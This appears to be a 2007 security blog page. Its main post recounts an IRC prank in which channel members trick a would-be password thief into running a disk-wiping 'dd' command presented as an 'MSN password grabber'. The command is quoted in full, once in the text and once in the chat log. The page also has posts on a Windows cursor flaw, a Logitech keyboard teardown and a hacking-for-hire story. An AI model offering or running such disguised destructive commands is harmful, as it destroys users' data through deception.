Hacking

A practical guide to get yourself owned on IRC

April 15, 2007 von Harald Puhl

For those of you who are not old enough (or simply don’t know), IRC stands for Internet Relay Chat, and is one of the first real-time, multi-user chat systems that was invented, with capabilities to span multiple servers across countries and continents, servicing thousands of users organized in channels. Daniel Stenberg has a brief overview of IRC history if you want to know a bit more.

Many communities have their dedicated IRC channels where they converse about their topics of interest, and in some cases even offer support for software or services. This is the case of #remote-exploit, registered on Freenode, which serves as a communication and support channel between developers and users of BackTrack, the best and most comprehensive Linux-based Live CD focused on security – this includes auditing, penetration testing, and so on. The IRC channel is frequented by the developers and a few hard-core users, who provide ad-hoc support to other users having difficulties with particular tools, or who may be trying to get something working but failing to do so. Regular chat around security-related topics makes the channel a very nice place to be if you are interested or work in IT security.

There seems to be a trend nowadays, maybe related to how our children are being educated at home and at school, that people simply demand to be spoon-fed particular information to accomplish a very specific task, disregarding the whole process of actually researching, learning and understanding what they are doing. This is particularly important in the security field, as lack of understanding can have very bad consequences, which brings us to today’s episode.

BIG FAT BOLD DISCLAIMERS

Kids, do not try this at home. Do not try to play either of the sides you see here, chances are you will lose. Particularly, do not run any of the commands you see being used!
Before you start posting comments about how cruel this was, I agree that things may have gone over the top, but if anyone deserved a lesson, it was this guy. Since there is no such thing as an Internet Supreme Court, we have no place to take these people so they can have their right to use the Internet suspended for two years. This guy was asking for information on how to commit several crimes, and this is something no true hacker will ever condone. He was warned many times that what he was asking was illegal and frowned upon, and he still insisted. All he lost was music and games (by his own admission, the contents of his hard drive) – it was very obvious he wasn’t using his computer for any beneficial purpose at the time, so he would just have to reinstall his games and rip his CDs again, no big deal.
Hacker does not equate to criminal. A hacker is after knowledge and experimentation, not causing intentional damage. Hackers are analytical and proud of their knowledge, acquired through years of learning and research. Thus, when someone asks for this knowledge to be siphoned off their brains, they get rather miffed, responding as you can see here. If you ask a hacker a sensible question, you will get a sensible answer, as we understand that the same we were taught by others, we have a responsibility to pass on the knowledge – not by spoon-feeding though! An excellent quote found in a DefCon FAQ: ‘Ignorance is forgivable, because it’s curable; stupidity is not… The difference between ignorance and stupidity is in the desire to remain ignorant’.
This is not a usual event. I have only seen something like this happen twice, and I’ve been on IRC since around 1993. Don’t think that our purpose in life is to sit in IRC channels waiting for victims to prey on.

This particular event took place the evening of April 31st, when someone using the nick JAGGEN (hint: don’t use caps in IRC for either your nick or typing, as it is considered shouting and rude) joined the #remote-exploit IRC channel, and began asking for information on how to perform various illegal acts:

[01:39] * Joins: JEGGAN (n=lechan@81-226-226-68-no58.tbcn.telia.com) [01:40] <JEGGAN> Hi i am very new att Back Track 2 and wonder if someone want to answere my questions in private... sorry my eng i am swe [01:47] <JEGGAN> so sad that nobody is here but i will be back tomorrow then [01:48] <Zi0n> tomorrow we closed [01:49] <JEGGAN> can u help me Zi0n ? [01:49] <Zi0n> deppends on the question [01:50] <JEGGAN> littel random about back track what i can do and not do and so on but i want to take it in privv but i goes good here if u want becus i don't want to spam down the channel whit stupied questions [01:50] <Zi0n> if you know your question is stupid, why ask it ? [01:51] <JEGGAN> becus i don't know if it's possibel [01:51] <JEGGAN> for exampel can i hack irc and take auth's in quakenet whit it? [01:51] <Zi0n> anyway, ask you question here and see if anyone can help you with it [01:51] <JEGGAN> ok [01:51] <JEGGAN> can i hack auth on quakenet whit back track? [01:52] <JEGGAN> can i hack emails so i can for exampel get my friends msn account and other's account?

Things went downhill from here – Zi0n told the guy to try in #ubuntu, a channel dedicated to a much better hacker tool collection – of course we all know what Ubuntu really is, and when he joined there he was promptly directed to #ubuntu-offtopic, where he asked the same questions, and was then directed to join #binrev, a hard-core hacker channel on a different IRC server:

[01:59] <FringeJacket> JEGGAN you've got a better chance there [01:59] <JEGGAN> okok [01:59] <JEGGAN> let's try then [02:00] <JEGGAN> uhm in binrev it's nobody there... [02:00] <kitche> JEGGAN: different server irc.binrev.net is their irc server

Not realizing he was going to make a huge mistake, and having been warned that what he was asking was illegal in at least three different IRC channels, he went on to join #binrev, where the following ensued:

[02:03] * Now talking in #binrev [02:04] <tehbizz> ok, ask the damn question alrady [02:10] <JEGGAN> who can i get my friends msn password easy ? [02:10] <sev> First, learn english. [02:10] <voltagex> JEGGAN: you can [02:10] <JEGGAN> how i mean [02:10] <Strom> JEGGAN: we don't condone that behavior here. [02:10] <voltagex> ask him for it [02:11] <sev> That's not the only thing wrong with your question. [02:11] <JEGGAN> i am new on this and i am swe so i don't have good eng i just want to talk to somebody that can help me a littel bit [02:11] <voltagex> no. [02:11] <voltagex> just no. [02:12] <sev> excellent. [02:12] <JEGGAN> ? [02:12] <JEGGAN> so you don't want to help me [02:12] <Adam> jeggan i know nothing of msn sorry [02:12] <voltagex> we don't do stealing passwords here [02:12] <JEGGAN> Adam what do you know about email ? [02:13] <JEGGAN> voltagex what are you doing here then? [02:13] <tehbizz> easiest way to get a password: ask for it [02:13] <tehbizz> discussion over. [02:13] <sev> JEGGAN: do you know about the amazing hacking powers of 'dd'? [02:13] <JEGGAN> sev no [02:13] <voltagex> JEGGAN: not stealing passwords [02:14] <sev> JEGGAN: I can help you hack with dd. [02:14] <JEGGAN> sev what is dd? [02:14] <tehbizz> yes [02:14] <voltagex> JEGGAN: mad hack tool [02:14] <sev> it's a remote password grabber [02:14] <JEGGAN> okok [02:14] <JEGGAN> where do i get it? [02:14] <sev> JEGGAN: do you have root access on your machine? [02:14] <JEGGAN> yes

Now our hapless “hacker” was getting interested…someone is going to teach me how to actually hack, using something called ‘dd’. If you read up Wikipedia’s entry of ‘dd’, you will see that it’s a low-level Unix tool that allows copying data between different media, for example, a floppy disk to a hard drive. It can use a variety of inputs, and write to a variety of outputs. Towards the bottom of the Wikipedia entry, there are some examples of the destructive power of dd, preceeded by this:

warning_dd

As an example, using dd if=/dev/urandom of=/dev/hda will overwrite the hard disk with random data. If this noob had bothered to simply type ‘dd’ in Google, he would have seen the Wikipedia entry as the second result, and taking two minutes to read through it, would have realized that it is not a remote password grabber. Determined to break into other people’s MSN, email and gaming accounts, he charged ahead:

[02:38] <sev> paste this: dd if=/dev/urandom of=/dev/hda # 18.173.134.224/get/hacker/tools/driveb/hack/msn_password_grabber.xof [02:38] <JEGGAN> where should i put it? [02:39] <voltagex> in the command line [02:39] <sev> in your command line, it's all one line, so paste it carefully [02:39] <JEGGAN> wtf cant puch ctr+c to copy :s [02:39] <tehbizz> shift+insert [02:39] <JEGGAN> now it worked

And the inevitable happened, after a few hours of waiting for something to happen while dd was running:

[18:07] <Citrus> try to reboot anyway [18:07] <JEGGAN> ok [18:08] <Citrus> you don't loose anything to see if LILO is there already [18:08] <JEGGAN> should i boot in windows or BT? [18:08] <Citrus> no, just boot normal without the CD [18:08] <JEGGAN> ok [18:08] <Citrus> you should see a menu [18:08] <JEGGAN> brb [18:08] * Quits: JEGGAN (~root@81-226-226-68-no58.tbcn.telia.com) (Quit: Leaving) [18:14] * Joins: JEGGAN (~JEGGAN@81-226-226-68-no58.tbcn.telia.com) [18:15] <JEGGAN> Citrus, [18:15] <JEGGAN> no menu and windows dosen't boot [18:15] <Citrus> what do you mean doesn't boot? [18:15] <JEGGAN> that i can't go into windows.. [18:16] <Citrus> JEGGAN: what message do you get? [18:16] <JEGGAN> insert system disk

You can read the whole exchange here, edited to remove irrelevant background chatter. Lessons to be learned from this:

Don’t be an idiot – if you are told to go search and read, it is very likely that there are numerous sources for answers to your question. If you are told what you want to do is illegal, drop it.
Don’t believe everything you are told on online (this applies to other means than IRC too!) – would you take advice from a total stranger on the street on how to do brain surgery on yourself? There is no shame in taking your time to double-check advice you are given.
Learn the basics and work your way up, not the other way around – if you ask to be taught a very high-level and complex topic, without having made the effort to even learn the basics, you will be frowned upon.

How to get your Windows PC owned by an animated cursor

April 3, 2007 von Harald Puhl

Some of you have already heard of the very nasty vulnerability recently discovered in Windows, which allows code injection when the hapless victim simply views an animated cursor on a HTML page or an email message. Microsoft has announced that due to the seriousness of this issue, it will publish an out-of-sync patch as soon as it is ready, i.e. they will not wait for Patch Tuesdayâ„¢. [Update: as I was writing this, I noticed this post which states that patch MS07-017 has been released].

What do you do when you have in your hands the best security distribution in the world? Use it! Here is the result of Mati Aharoni’s (aka Muts) impersonation of The Mexican – click the image to view the full video.

Kids, do not try this at home, and if you are using Windows, well…my sincere condolences. While you are at it, check out the home site for BackTrack.

Autopsy of a Logitech MX5000, and the reason why it sucks

März 14, 2007 von Harald Puhl

I wrote before about the Logitech MX5000 Bluetooth keyboard & mouse combo, and there are plenty of posts around the web that confirm that the product sucks – badly.

To recap a bit, the problems are random reboots of the keyboard, disconnections of keyboard and mouse, erratic mouse behavior (including spontaneous motion of the cursor), and repeated keystrokes after the keyboard has not been used for a few minutes (resulting in things like “aaaaaaaafter the news…”). In all, a very frustrating and annoying experience, for a rather expensive combo. Logitech seem to acknowledge the problem, but I have not yet seen any form of update that could fix this, and my theory is that the problem cannot be fixed with a simple software update.

Declaring the keyboard and mouse defunct, I performed an autopsy, which revealed a few interesting facts (details after the jump):

The Bluetooth dongle has a very very strange RF design – it uses a normal groundplane meander PCB antenna, but then it has a copper-wire loop antenna on top.
Dongle and keyboard use Bluetooth chipsets from different manufacturers (CSR and Broadcom), in theory interoperable, in reality…well.
The touchpad uses a very crappy sensor design, which explains the lack of responsiveness and uselesness of the scrolling controls.

Let’s start with the dongle. Below are a couple of photos of the opened device, the first with the loop antenna in place, the second with it removed, showing the meander. If someone with better RF knowledge than me can explain why this makes sense, I would be grateful. The design of the loop itself is wrong for 2.4GHz, having a wire length about 10 times larger than what would be required given its size.

The dongle uses a Broadcom BCM2045 chipset, with a 4Mbit flash memory onto which the firmware is loaded. The meander is a PCB track designed for 50ohm impedance, coupled to the chipset via a normal inductor-resistor-inductor matching network. Noticeable is the lack of baluns or filters, I’ll have to check the datasheet (if it’s publicly available) on this aspect.

Let’s take a look at the keyboard, starting with the touch controls. These are built into the keyboard as a separate module, linked to the main control board with a flat ribbon cable, and consist of three main pieces – the PCB and touch sensors, external case with printed cover, and a plastic support with built-in LED light pipes. The controls are made with a layer of gold-plated copper, printed on the underside of the PCB, and on the top side lives the control chip, made by Synaptics (who also makes touchpad systems and other stuff).

The principle by which these type of controls work is capacitance changes. When you place your finger near the sensor, a capacitive effect takes place (using the air and any other material in between as dielectric), which can be measured. It is very small, but enough to give an indication that a finger is present. There are a few rules that one must follow when designing such touchpads, as any interference in the capacitive effect can have negative results on the ‘feeling’ of the controls. Namely, ground planes have to be carefully controlled, and usually placed away from the sensor area, the sensors have to have a minimum size in order to be effective, and any trace routes from the sensor pad to the control IC have to be kept tight, avoiding cross-overs and other disturbances.

I am not familiar with the Synaptics chip, but I have worked with Quantum Research QProx devices, and I cannot see how the physics of capacitance could be avoided in either case. The MX5000 design violates all these rules. The sensor areas are irregular, with a gaping hole in the middle to allow for LED light to pass through, there are ground planes all over the PCB, the tracks meet and part at various spacings and passing right next to ground planes. The biggest joke seems to be the ’sliding’ sensors for the volume and zoom. These are depicted on the face of the keyboard as smooth analog paths, as if one could go from minimum zoom or volume to maximum by sliding the finger to each end of the vertical scale. The truth is that to change the volume in any significant way, one has to repeatedly slide the finger along the whole path of the scale several times, and in some cases, the detection doesn’t work. You end up looking demented, rubbing away the side of your keyboard repeatedly! As is shown on the photo, the sliding scale has only 7 distinct sensors, thus giving you a maximum of six detectable steps in either direction (each step is signaled by the triggering of one sensor, then the one adjacent, determining direction of finger travel). It would be a bad idea to place the whole volume or zoom range on a scale of six steps, and so they settled for the crazy-monkey-rubbing-keyboard action instead.

The next two pictures show the PCB inside the plastic assembly that houses the faceplate. Notice how the cutouts allow for light from the LEDs to be piped towards the labels and icons.

And finally, the last part of the broken equation – the Bluetooth module on the keyboard. It uses a CSR BlueCore3 ROM, which is cheap but cannot have its firmware modified after the die has been printed, meaning whatever bugs you had in the device will be there forever. Again, the module uses a meander antenna. Now, I am not too familiar with the Broadcom chipset, but I have worked with CSR chipsets quite a bit, and know they provide a balanced antenna output, this means that to use an antenna such as a meander or chip, you have to go through a balun. I don’t see a balun on the MX5000’s module, and so it appears they have attempted to balance the antenna with another set of meanders, which can be seen between the chip and the large main meander in the picture below:

Again, this design doesn’t seem to be the best in terms of RF performance, specially when you have a large inductor nearby (L1).

Conclusion? Don’t buy one of these, if you want to go wireless, get one of the non-Bluetooth (some also work at 2.4GHz) keyboard/mouse combinations, and I would still say get a Logitech, as they make some very good ones, such as the MX3000. I’ve always used Logitech, but the MX5000 has been a real lemon.

Trying to hire hackers to commit a crime is a bad idea

Dezember 29, 2006 von Harald Puhl

This is rather funny, be it not because it involves a US congressman, Denny Rehberg of Montana, and his communications director. Apparently, Rehberg was not happy with the grades he got while at Texas Christian University, and thus started to shop around for a hacker that would break into the institution’s systems to upgrade his grades. He contacted none other than attrition.org, where the entire email exchange has been posted. It is a rather fun read if you are a true hacker – not to be confused with a criminal, who are into doing these sort of things – and a warning to clueless politicians.